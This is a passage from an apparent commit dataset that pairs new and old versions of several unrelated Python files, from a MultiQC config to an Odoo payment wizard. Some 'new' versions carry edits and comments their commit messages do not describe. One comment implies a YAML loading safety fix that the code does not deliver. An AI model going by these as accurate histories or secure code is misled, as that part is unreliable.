        'bcbio/damage': {'fn': '*damage.yaml'},
    }
    config.update_dict(config.sp, bcbio_search_patterns)
    # Strip the trailing '_bcbio*' suffix when deriving sample names.
    config.fn_clean_exts.append({'type': 'regex', 'pattern': '_bcbio.*'})
    # Hide general-stats columns that duplicate metrics bcbio reports
    # itself (e.g. average coverage supersedes QualiMap's median).
    config.update_dict(config.table_columns_visible, {
        'FastQC': {
            'percent_duplicates': False,
            'total_sequences': False,
        },
        'QualiMap': {
            'percentage_aligned': False,
            'median_coverage': False,
        },
        'Samtools Stats': {
            'non-primary_alignments': False,
            'reads_mapped': False,
            'reads_mapped_percent': False,
            'raw_total_sequences': False,
            'error_rate': False,
        },
        'SnpEff': {
            'Change_rate': False,
            'Ts_Tv_ratio': False,
            'Number_of_variants_before_filter': False,
        },
    })
    # Order in which module sections appear in the report; bcbio first.
    config.module_order = [
        "bcbio",
        "samtools",
        "goleft_indexcov",
        "bcftools",
        "picard",
        "qualimap",
        "snpeff",
        "fastqc",
        "preseq"
    ]
| from __future__ import absolute_import
from .bcbio import MultiqcModule
from multiqc import config
# Add search patterns and config options for the things that are used in MultiQC_bcbio
def multiqc_bcbio_config():
""" Set up MultiQC config defaults for this package """
bcbio_search_patterns = {
'bcbio/metrics': {'fn': '*_bcbio.txt'},
'bcbio/coverage': {'fn': '*_bcbio_coverage.txt'},
'bcbio/coverage_avg': {'fn': '*_bcbio_coverage_avg.txt'},
'bcbio/variants': {'fn': '*_bcbio_variants.txt'},
'bcbio/target': {'fn': 'target_info.yaml'},
'bcbio/qsignature': {'fn': '*bcbio_qsignature.ma'},
'bcbio/vcfstats': {'fn': '*_bcbio_variants_stats.txt'},
'bcbio/seqbuster': {'contents': 'seqbuster'},
'bcbio/umi': {'fn': '*_umi_stats.yaml'},
'bcbio/viral': {'fn': '*viral*-counts.txt'},
'bcbio/damage': {'fn': '*damage.yaml'},
}
config.update_dict(config.sp, bcbio_search_patterns)
config.fn_clean_exts.append({'type': 'regex', 'pattern': '_bcbio.*'})
config.update_dict(config.table_columns_visible, {
'FastQC': {
'percent_duplicates': False,
'total_sequences': False,
},
'QualiMap': {
'percentage_aligned': False,
},
'Samtools Stats': {
'non-primary_alignments': False,
'reads_mapped': False,
'reads_mapped_percent': False,
'raw_total_sequences': False,
'error_rate': False,
},
'SnpEff': {
'Change_rate': False,
'Ts_Tv_ratio': False,
'Number_of_variants_before_filter': False,
},
})
config.module_order = [
"bcbio",
"samtools",
"goleft_indexcov",
"bcftools",
"picard",
"qualimap",
"snpeff",
"fastqc",
"preseq"
]
| mit | Python |
cf20e89c12cf88ab57f9cdc758acbbde70282a93 | Set index_prefix to '' in CONFIG_TEMPLATE. | philipsoutham/py-mysql2pgsql | mysql2pgsql/lib/config.py | mysql2pgsql/lib/config.py | from __future__ import with_statement, absolute_import
import os.path
from yaml import load
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from .errors import ConfigurationFileInitialized,\
ConfigurationFileNotFound
class ConfigBase(object):
    """Base class holding the parsed YAML configuration.

    Loads the YAML file at ``config_file_path`` and exposes the parsed
    result as ``self.options``.
    """

    def __init__(self, config_file_path):
        # Fix: the original did `load(open(path))`, leaking the file
        # handle until GC.  Use a context manager, and pass the Loader
        # explicitly -- yaml.load() without a Loader is deprecated and
        # unsafe on untrusted input (the module already imports the
        # fastest available Loader at the top of the file).
        with open(config_file_path) as config_file:
            self.options = load(config_file, Loader=Loader)
class Config(ConfigBase):
    """Configuration loaded from a YAML file on disk.

    If the file is missing it can be bootstrapped from CONFIG_TEMPLATE;
    in that case an exception is still raised on purpose, so the user
    reviews the generated defaults before running a conversion.
    """

    def __init__(self, config_file_path, generate_if_not_found=True):
        """Load the config file, optionally creating it first.

        :param config_file_path: path of the YAML configuration file
        :param generate_if_not_found: when True, write a default
            template file if none exists yet

        Raises ConfigurationFileInitialized right after writing a fresh
        template (deliberate: the user must review it and retry), or
        ConfigurationFileNotFound when the file is absent and was not
        (or could not be) generated.
        """
        if not os.path.isfile(config_file_path):
            if generate_if_not_found:
                self.reset_configfile(config_file_path)
            # Re-check: the template write above may have created it.
            if os.path.isfile(config_file_path):
                raise ConfigurationFileInitialized("""No configuration file found.
A new file has been initialized at: %s
Please review the configuration and retry...""" % config_file_path)
            else:
                raise ConfigurationFileNotFound("cannot load config file %s" % config_file_path)
        super(Config, self).__init__(config_file_path)

    def reset_configfile(self, file_path):
        # Overwrite (or create) the file with the default template.
        with open(file_path, 'w') as f:
            f.write(CONFIG_TEMPLATE)
CONFIG_TEMPLATE = """
# a socket connection will be selected if a 'socket' is specified
# also 'localhost' is a special 'hostname' for MySQL that overrides the 'port' option
# and forces it to use a local socket connection
# if tcp is chosen, you can use compression
mysql:
hostname: localhost
port: 3306
socket: /tmp/mysql.sock
username: mysql2psql
password:
database: mysql2psql_test
compress: false
destination:
# if file is given, output goes to file, else postgres
file:
postgres:
hostname: localhost
port: 5432
username: mysql2psql
password:
database: mysql2psql_test
# if tables is given, only the listed tables will be converted. leave empty to convert all tables.
#only_tables:
#- table1
#- table2
# if exclude_tables is given, exclude the listed tables from the conversion.
#exclude_tables:
#- table3
#- table4
# if supress_data is true, only the schema definition will be exported/migrated, and not the data
supress_data: false
# if supress_ddl is true, only the data will be exported/imported, and not the schema
supress_ddl: false
# if force_truncate is true, forces a table truncate before table loading
force_truncate: false
# if timezone is true, forces to append/convert to UTC tzinfo mysql data
timezone: false
# if index_prefix is given, indexes will be created whith a name prefixed with index_prefix
index_prefix: ''
"""
| from __future__ import with_statement, absolute_import
import os.path
from yaml import load
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from .errors import ConfigurationFileInitialized,\
ConfigurationFileNotFound
class ConfigBase(object):
def __init__(self, config_file_path):
self.options = load(open(config_file_path))
class Config(ConfigBase):
def __init__(self, config_file_path, generate_if_not_found=True):
if not os.path.isfile(config_file_path):
if generate_if_not_found:
self.reset_configfile(config_file_path)
if os.path.isfile(config_file_path):
raise ConfigurationFileInitialized("""No configuration file found.
A new file has been initialized at: %s
Please review the configuration and retry...""" % config_file_path)
else:
raise ConfigurationFileNotFound("cannot load config file %s" % config_file_path)
super(Config, self).__init__(config_file_path)
def reset_configfile(self, file_path):
with open(file_path, 'w') as f:
f.write(CONFIG_TEMPLATE)
CONFIG_TEMPLATE = """
# a socket connection will be selected if a 'socket' is specified
# also 'localhost' is a special 'hostname' for MySQL that overrides the 'port' option
# and forces it to use a local socket connection
# if tcp is chosen, you can use compression
mysql:
hostname: localhost
port: 3306
socket: /tmp/mysql.sock
username: mysql2psql
password:
database: mysql2psql_test
compress: false
destination:
# if file is given, output goes to file, else postgres
file:
postgres:
hostname: localhost
port: 5432
username: mysql2psql
password:
database: mysql2psql_test
# if tables is given, only the listed tables will be converted. leave empty to convert all tables.
#only_tables:
#- table1
#- table2
# if exclude_tables is given, exclude the listed tables from the conversion.
#exclude_tables:
#- table3
#- table4
# if supress_data is true, only the schema definition will be exported/migrated, and not the data
supress_data: false
# if supress_ddl is true, only the data will be exported/imported, and not the schema
supress_ddl: false
# if force_truncate is true, forces a table truncate before table loading
force_truncate: false
# if timezone is true, forces to append/convert to UTC tzinfo mysql data
timezone: false
# if index_prefix is given, indexes will be created whith a name prefixed with index_prefix
index_prefix:
"""
| mit | Python |
9a698d1428fbe0744c9dba3532b778569dbe1dd4 | Add docstrings and author reference | facundovictor/non-blocking-socket-samples | server.py | server.py | """
A Simple Server class that allows to configure a socket in a very simple way.
It is for studying purposes only.
"""
import socket
import sys
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
class SimpleServer(object):
    """Simple server using the socket library."""

    def __init__(self, blocking=False, connection_oriented=True):
        """
        The constructor initializes socket specifying the blocking status and
        if it must be a connection oriented socket.

        :param blocking: A flag that specifies if the socket must be blocking
        :ptype: Boolean
        :param connection_oriented: A flag that specifies if the socket must
        be connection oriented (TCP) or not (UDP)
        :ptype: Boolean
        """
        # Bug fix: `connection_oriented` was accepted and documented but
        # never used, so callers asking for a datagram socket silently
        # got a TCP one.  Honor it: SOCK_STREAM when True, SOCK_DGRAM
        # when False.  Default behavior is unchanged.
        if connection_oriented:
            sock_type = socket.SOCK_STREAM
        else:
            sock_type = socket.SOCK_DGRAM
        self.sock = socket.socket(socket.AF_INET, sock_type)
        if not blocking:
            # 0 -> non-blocking mode: operations raise instead of waiting.
            self.sock.setblocking(0)

    def connect(self, host, port):
        """
        Connects the server to the "host", and prepares it to listen on "port"

        :param host: The network layer identifier of an interface
        :ptype: String or Integer (see help(socket))
        :param port: The transport layer identifier of an application
        :ptype: Integer
        """
        # NOTE(review): a server would normally bind()/listen() here;
        # connect() is what a client does -- confirm intended usage.
        server_address = (host, port)
        self.sock.connect(server_address)
        print('starting up on %s port %s' % server_address)
| import socket
import sys
class SimpleServer(object):
"""Simple server using the socket library"""
def __init__(self, blocking=False, connection_oriented=True):
"""
The constructor initializes socket specifying the blocking status and
if it must be a connection oriented socket.
:param blocking: A flag that specifies if the socket must be blocking
:ptype: Boolean
:param connection_oriented: A flag that specifies if the socket must
be connection oriented or not
:ptype: Boolean
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not blocking:
self.sock.setblocking(0)
def connect(self, host, port):
"""
Connects the server to the "host", and prepares it to listen on "port"
:param host: The network layer identifier of an interface
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
self.sock.connect((host, port))
| mit | Python |
195adc56728d2c0e958d81142fb3f4b90cef35ea | Make server.py work in both python 2 and 3 | colevk/dark-souls-map-viewer,colevk/dark-souls-map-viewer | server.py | server.py | #!/usr/bin/env python
from __future__ import print_function
import os
try:
# python 2
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import SimpleHTTPServer
test = SimpleHTTPServer.test
except ImportError:
# python 3
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import http.server
test = http.server.test
class GzipHTTPRequestHandler(SimpleHTTPRequestHandler):
    """Request handler that serves .iv files with a gzip
    Content-Encoding header, otherwise behaving exactly like the stock
    SimpleHTTPRequestHandler."""

    def send_head(self):
        """Common code for GET and HEAD commands.
        We want to save space with the .iv files, so send them gzipped.
        This overrides the default headers only for .iv files.
        """
        # Mirrors SimpleHTTPRequestHandler.send_head; only the header
        # section for .iv files differs.  Returns an open file object
        # (the caller is responsible for closing it) or None after a
        # redirect/error response has already been sent.
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            if not self.path.endswith('/'):
                # Redirect directory requests that lack a trailing slash.
                self.send_response(301)
                self.send_header("Location", self.path + "/")
                self.end_headers()
                return None
            for index in "index.html", "index.htm":
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                # No index file found: fall back to a directory listing.
                return self.list_directory(path)
        ctype = self.guess_type(path)
        try:
            f = open(path, 'rb')
        except IOError:
            self.send_error(404, "File not found")
            return None
        self.send_response(200)
        # This part here is the only difference from the base class
        if self.path.endswith(".iv"):
            # .iv payloads are stored gzip-compressed on disk; tell the
            # client to decompress transparently via Content-Encoding.
            self.send_header("Content-type", "application/octet-stream")
            self.send_header("Content-Encoding", "gzip")
        else:
            self.send_header("Content-type", ctype)
        # No more differences after this
        fs = os.fstat(f.fileno())
        self.send_header("Content-Length", str(fs[6]))
        self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
        self.end_headers()
        return f
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
print("\nGo to http://localhost:8000 to view.")
print("Type Ctrl-C to quit.\n")
try:
test(GzipHTTPRequestHandler, HTTPServer)
except KeyboardInterrupt:
print("\nExiting.")
| #!/usr/bin/env python
import os
import SimpleHTTPServer
import BaseHTTPServer
class GzipHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def send_head(self):
"""Common code for GET and HEAD commands.
We want to save space with the .iv files, so send them gzipped.
This overrides the default headers only for .iv files.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
# This part here is the only difference from the base class
if self.path.endswith(".iv"):
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Encoding", "gzip")
else:
self.send_header("Content-type", ctype)
# No more differences after this
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
print "\nGo to http://localhost:8000 to view."
print "Type Ctrl-C to quit.\n"
try:
SimpleHTTPServer.test(GzipHTTPRequestHandler, BaseHTTPServer.HTTPServer)
except KeyboardInterrupt:
print "\nExiting."
| mit | Python |
ce2b797cb61301f3e8b7f21389baa112db7c1f90 | Allow user to specify active and comment | redhat-cip/python-dciclient,redhat-cip/python-dciclient | dciclient/v1/api/jobdefinition.py | dciclient/v1/api/jobdefinition.py | # -*- encoding: utf-8 -*-
#
# Copyright 2015-2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from dciclient.v1.api import base
RESOURCE = 'jobdefinitions'
TABLE_HEADERS = ['id', 'name', 'priority', 'topic_id', 'active', 'comment',
'etag', 'created_at', 'updated_at']
def create(context, name, topic_id, priority=None, active=None, comment=None,
component_types=None):
if component_types is None:
component_types = []
return base.create(context, RESOURCE, name=name, priority=priority,
active=active, comment=comment, topic_id=topic_id,
component_types=component_types)
def list(context, topic_id, embed=None):
return base.list(context, RESOURCE, topic_id=topic_id, embed=embed)
def get(context, id, where=None, embed=None):
return base.get(context, RESOURCE, id=id, where=where, embed=embed)
def delete(context, id, etag):
return base.delete(context, RESOURCE, id=id, etag=etag)
def annotate(context, id, comment, etag):
return base.update(context, RESOURCE, id=id, etag=etag, comment=comment)
def setactive(context, id, active, etag):
    """Update the 'active' flag of a job definition.

    :param context: API context holding the HTTP session.
    :param id: id of the jobdefinition to update.
    :param active: truth value; accepts a real boolean as well as the
        strings 'True'/'true' (any other value maps to False, matching
        the previous behavior for string input).
    :param etag: current etag of the resource (optimistic locking).
    """
    # Bug fix: the old test `active in ['True', 'true']` mapped a real
    # boolean True to False.  Normalizing through str() makes both
    # booleans and the historical string spellings work.
    active_bool = str(active).lower() == 'true'
    return base.update(context, RESOURCE, id=id, etag=etag, active=active_bool)
def get_components(context, id):
uri = '%s/%s/%s/components' % (context.dci_cs_api, RESOURCE, id)
return context.session.get(uri)
def add_test(context, id, test_id):
uri = '%s/%s/%s/tests' % (context.dci_cs_api, RESOURCE, id)
return context.session.post(uri, json={'test_id': test_id})
def list_tests(context, id, **kwargs):
return base.list(context, RESOURCE, id=id, subresource='tests', **kwargs)
def remove_test(context, id, test_id):
return base.delete(context, RESOURCE, id,
subresource='tests',
subresource_id=test_id)
| # -*- encoding: utf-8 -*-
#
# Copyright 2015-2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from dciclient.v1.api import base
RESOURCE = 'jobdefinitions'
TABLE_HEADERS = ['id', 'name', 'priority', 'topic_id', 'active', 'comment',
'etag', 'created_at', 'updated_at']
def create(context, name, topic_id, priority=None, component_types=None):
if component_types is None:
component_types = []
return base.create(context, RESOURCE, name=name, priority=priority,
topic_id=topic_id, component_types=component_types)
def list(context, topic_id, embed=None):
return base.list(context, RESOURCE, topic_id=topic_id, embed=embed)
def get(context, id, where=None, embed=None):
return base.get(context, RESOURCE, id=id, where=where, embed=embed)
def delete(context, id, etag):
return base.delete(context, RESOURCE, id=id, etag=etag)
def annotate(context, id, comment, etag):
return base.update(context, RESOURCE, id=id, etag=etag, comment=comment)
def setactive(context, id, active, etag):
active_bool = active in ['True', 'true']
return base.update(context, RESOURCE, id=id, etag=etag, active=active_bool)
def get_components(context, id):
uri = '%s/%s/%s/components' % (context.dci_cs_api, RESOURCE, id)
return context.session.get(uri)
def add_test(context, id, test_id):
uri = '%s/%s/%s/tests' % (context.dci_cs_api, RESOURCE, id)
return context.session.post(uri, json={'test_id': test_id})
def list_tests(context, id, **kwargs):
return base.list(context, RESOURCE, id=id, subresource='tests', **kwargs)
def remove_test(context, id, test_id):
return base.delete(context, RESOURCE, id,
subresource='tests',
subresource_id=test_id)
| apache-2.0 | Python |
21df1908fa019ca6ad37631888b530a4a9f5abe6 | Fix test recent files when using python runtest.py | pyQode/pyqode.core,pyQode/pyqode.core,zwadar/pyqode.core | test/test_widgets/test_recent_files.py | test/test_widgets/test_recent_files.py | import pytest
from pyqode.core.widgets import RecentFilesManager, MenuRecentFiles
import pyqode.core
def test_open_file():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
assert manager.last_file() is None
manager.open_file(__file__)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_remove_file():
manager = RecentFilesManager('pyQode', 'test')
manager.max_recent_files = 10
manager.clear()
manager.open_file(__file__)
test_path = pyqode.core.__file__
manager.open_file(test_path)
assert len(manager.get_recent_files()) == 2
assert manager.last_file() == test_path
manager.remove(test_path)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_max_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.max_recent_files = 1
manager.open_file(__file__)
assert manager.last_file() == __file__
manager.open_file(pyqode.core.__file__)
assert manager.last_file() == pyqode.core.__file__
assert len(manager.get_recent_files()) == 1
def test_menu_recent_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(__file__)
manager.open_file(pyqode.core.__file__)
mnu = MenuRecentFiles(None, recent_files_manager=manager, title='Recents',
icon_provider=None, clear_icon=None)
mnu.show()
def test_normalized_path():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(r'c:\Test/test.cbl')
manager.open_file(r'c:\Test\test.cbl')
assert len(manager.get_value('list', [])) == 1
| import pytest
from pyqode.core.widgets import RecentFilesManager, MenuRecentFiles
import pyqode.core
def test_open_file():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
assert manager.last_file() is None
manager.open_file(__file__)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_remove_file():
manager = RecentFilesManager('pyQode', 'test')
manager.max_recent_files = 10
manager.clear()
manager.open_file(__file__)
test_path = pyqode.core.__file__
manager.open_file(test_path)
assert len(manager.get_recent_files()) == 2
assert manager.last_file() == test_path
manager.remove(test_path)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_max_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.max_recent_files = 1
manager.open_file(__file__)
assert manager.last_file() == __file__
manager.open_file(pytest.__file__)
assert manager.last_file() == pytest.__file__
assert len(manager.get_recent_files()) == 1
def test_menu_recent_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(__file__)
manager.open_file(pytest.__file__)
mnu = MenuRecentFiles(None, recent_files_manager=manager, title='Recents',
icon_provider=None, clear_icon=None)
mnu.show()
def test_normalized_path():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(r'c:\Test/test.cbl')
manager.open_file(r'c:\Test\test.cbl')
assert len(manager.get_value('list', [])) == 1
| mit | Python |
40869b7aa7001f26a76e4849f6bf604bf6056462 | Increase version number | sebest/py2loggly | py2loggly/__init__.py | py2loggly/__init__.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Sebastien Estienne'
__email__ = 'sebastien.estienne@gmail.com'
__version__ = '1.1.1'
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Sebastien Estienne'
__email__ = 'sebastien.estienne@gmail.com'
__version__ = '0.2'
| mit | Python |
197fcfb88a034b0a12c841da3e06d7d8c37e55af | bump dev version after 0.17.1 tag | desihub/desisim,desihub/desisim | py/desisim/_version.py | py/desisim/_version.py | __version__ = '0.17.1.dev753'
| __version__ = '0.17.1'
| bsd-3-clause | Python |
27d3b463896b2bf04e22f49952746a368e4904e0 | FIX remove coma at end of line | acsone/bank-payment,hbrunn/bank-payment,diagramsoftware/bank-payment,CompassionCH/bank-payment,CompassionCH/bank-payment,open-synergy/bank-payment | account_payment_partner/wizard/payment_order_create.py | account_payment_partner/wizard/payment_order_create.py | # -*- coding: utf-8 -*-
##############################################################################
#
# Account Payment Partner module for Odoo
# Copyright (C) 2014-2015 Akretion (http://www.akretion.com)
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class PaymentOrderCreate(models.TransientModel):
    """Wizard extension: filter candidate invoices by payment mode."""
    _inherit = 'payment.order.create'

    # How the invoice's payment mode must relate to the order's mode.
    # NOTE(review): no field-level default is set; default_get() below
    # fills it from the mode's default_payment_mode -- confirm every
    # payment mode defines one, otherwise the selection starts empty.
    payment_mode = fields.Selection([
        ('same', 'Same'),
        ('same_or_null', 'Same or empty'),
        ('any', 'Any'),
        ], string='Payment Mode on Invoice')

    @api.model
    def default_get(self, field_list):
        """Default 'payment_mode' from the active payment order's mode.

        Expects the wizard to be opened from a payment.order record
        (active_model/active_id in context) and fails fast otherwise.
        """
        res = super(PaymentOrderCreate, self).default_get(field_list)
        context = self.env.context
        assert context.get('active_model') == 'payment.order',\
            'active_model should be payment.order'
        assert context.get('active_id'), 'Missing active_id in context !'
        pay_order = self.env['payment.order'].browse(context['active_id'])
        res['payment_mode'] = pay_order.mode.default_payment_mode
        return res

    @api.multi
    def extend_payment_order_domain(self, payment_order, domain):
        """Restrict the invoice search domain according to payment_mode.

        'same' keeps only invoices whose payment mode equals the
        order's; 'same_or_null' also accepts invoices with no payment
        mode; 'any' leaves the domain untouched.  ``domain`` is mutated
        in place, following the convention of this hook.
        """
        res = super(PaymentOrderCreate, self).extend_payment_order_domain(
            payment_order, domain)
        if self.invoice and self.payment_mode:
            if self.payment_mode == 'same':
                domain.append(
                    ('invoice.payment_mode_id', '=', payment_order.mode.id))
            elif self.payment_mode == 'same_or_null':
                domain += [
                    '|',
                    ('invoice.payment_mode_id', '=', False),
                    ('invoice.payment_mode_id', '=', payment_order.mode.id)]
            # if payment_mode == 'any', don't modify domain
        return res
| # -*- coding: utf-8 -*-
##############################################################################
#
# Account Payment Partner module for Odoo
# Copyright (C) 2014-2015 Akretion (http://www.akretion.com)
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class PaymentOrderCreate(models.TransientModel):
_inherit = 'payment.order.create'
payment_mode = fields.Selection([
('same', 'Same'),
('same_or_null', 'Same or empty'),
('any', 'Any'),
], string='Payment Mode on Invoice', default='same')
@api.model
def default_get(self, field_list):
res = super(PaymentOrderCreate, self).default_get(field_list)
context = self.env.context
assert context.get('active_model') == 'payment.order',\
'active_model should be payment.order'
assert context.get('active_id'), 'Missing active_id in context !'
pay_order = self.env['payment.order'].browse(context['active_id'])
res['payment_mode'] = pay_order.mode.default_payment_mode,
return res
@api.multi
def extend_payment_order_domain(self, payment_order, domain):
res = super(PaymentOrderCreate, self).extend_payment_order_domain(
payment_order, domain)
if self.invoice and self.payment_mode:
if self.payment_mode == 'same':
domain.append(
('invoice.payment_mode_id', '=', payment_order.mode.id))
elif self.payment_mode == 'same_or_null':
domain += [
'|',
('invoice.payment_mode_id', '=', False),
('invoice.payment_mode_id', '=', payment_order.mode.id)]
# if payment_mode == 'any', don't modify domain
return res
| agpl-3.0 | Python |
c07ee0cc90c32e842b0a3b0eed203f2cb2161188 | Bump version | mesnardo/snake | snake/version.py | snake/version.py | # file: version.py
# author: Olivier Mesnard (mesnardo@gwu.edu)
# description: Set up the version.
import os
_version_major = 0
_version_minor = 1
_version_micro = '2'
_version_extra = 'dev'

# Assemble the dotted version string: major and minor always appear,
# micro and extra are appended only when non-empty.
_ver_parts = [str(_version_major), str(_version_minor)]
if _version_micro:
    _ver_parts.append(str(_version_micro))
if _version_extra:
    _ver_parts.append(str(_version_extra))
__version__ = '.'.join(_ver_parts)
CLASSIFIERS = ['Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
'Programming Language :: Python']
description = 'snake: post-processing tools for the flying-snake simulations'
# Long description will go up on the pypi page
long_description = """
Snake
=====
Snake is a collection of Python modules used to post-process the numerical
solution of flying-snake simulations using one of the following software:
* [cuIBM](https://github.com/barbagroup/cuIBM):
a GPU-based immersed boundary method code;
* [PetIBM](https://github.com/barbagroup/PetIBM):
a parallel immersed boundary method code;
* [IBAMR](https://github.com/IBAMR/IBAMR):
an adaptive and distributed-memory parallel implementation of the immersed boundary (IB) method;
* IcoFOAM: the incompressible laminar solver of [OpenFOAM](http://www.openfoam.org/).
License
=======
``snake`` is licensed under the terms of the MIT license. See the file
"LICENSE" for information on the history of this software, terms & conditions
for usage, and a DISCLAIMER OF ALL WARRANTIES.
All trademarks referenced herein are property of their respective holders.
Copyright (c) 2016--, Olivier Mesnard, The George Washington University.
"""
NAME = 'snake'
MAINTAINER = 'Olivier Mesnard'
MAINTAINER_EMAIL = 'mesnardo@gwu.edu'
DESCRIPTION = description
LONG_DESCRIPTION = long_description
URL = 'https://github.com/mesnardo/snake'
DOWNLOAD_URL = ''
LICENSE = 'MIT'
AUTHOR = 'Olivier Mesnard'
AUTHOR_EMAIL = 'mesnardo@gwu.edu'
PLATFORMS = 'Unix'
MAJOR = _version_major
MINOR = _version_minor
MICRO = _version_micro
VERSION = __version__
PACKAGES = ['snake',
'snake.cuibm',
'snake.petibm',
'snake.openfoam',
'snake.ibamr',
'snake.openfoam',
'snake.solutions',
'snake.tests']
PACKAGE_DATA = {'snake': [os.path.join('styles', '*')]}
REQUIRES = ['numpy', 'matplotlib', 'scipy']
| # file: version.py
# author: Olivier Mesnard (mesnardo@gwu.edu)
# description: Set up the version.
import os
_version_major = 0
_version_minor = 1
_version_micro = '1'
_version_extra = 'dev'
# construct full version string
_ver = [_version_major, _version_minor]
if _version_micro:
_ver.append(_version_micro)
if _version_extra:
_ver.append(_version_extra)
__version__ = '.'.join(map(str, _ver))
CLASSIFIERS = ['Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
'Programming Language :: Python']
description = 'snake: post-processing tools for the flying-snake simulations'
# Long description will go up on the pypi page
long_description = """
Snake
=====
Snake is a collection of Python modules used to post-process the numerical
solution of flying-snake simulations using one of the following software:
* [cuIBM](https://github.com/barbagroup/cuIBM):
a GPU-based immersed boundary method code;
* [PetIBM](https://github.com/barbagroup/PetIBM):
a parallel immersed boundary method code;
* [IBAMR](https://github.com/IBAMR/IBAMR):
an adaptive and distributed-memory parallel implementation of the immersed boundary (IB) method;
* IcoFOAM: the incompressible laminar solver of [OpenFOAM](http://www.openfoam.org/).
License
=======
``snake`` is licensed under the terms of the MIT license. See the file
"LICENSE" for information on the history of this software, terms & conditions
for usage, and a DISCLAIMER OF ALL WARRANTIES.
All trademarks referenced herein are property of their respective holders.
Copyright (c) 2016--, Olivier Mesnard, The George Washington University.
"""
NAME = 'snake'
MAINTAINER = 'Olivier Mesnard'
MAINTAINER_EMAIL = 'mesnardo@gwu.edu'
DESCRIPTION = description
LONG_DESCRIPTION = long_description
URL = 'https://github.com/mesnardo/snake'
DOWNLOAD_URL = ''
LICENSE = 'MIT'
AUTHOR = 'Olivier Mesnard'
AUTHOR_EMAIL = 'mesnardo@gwu.edu'
PLATFORMS = 'Unix'
MAJOR = _version_major
MINOR = _version_minor
MICRO = _version_micro
VERSION = __version__
PACKAGES = ['snake',
'snake.cuibm',
'snake.petibm',
'snake.openfoam',
'snake.ibamr',
'snake.openfoam',
'snake.solutions',
'snake.tests']
PACKAGE_DATA = {'snake': [os.path.join('styles', '*')]}
REQUIRES = ['numpy', 'matplotlib', 'scipy']
| mit | Python |
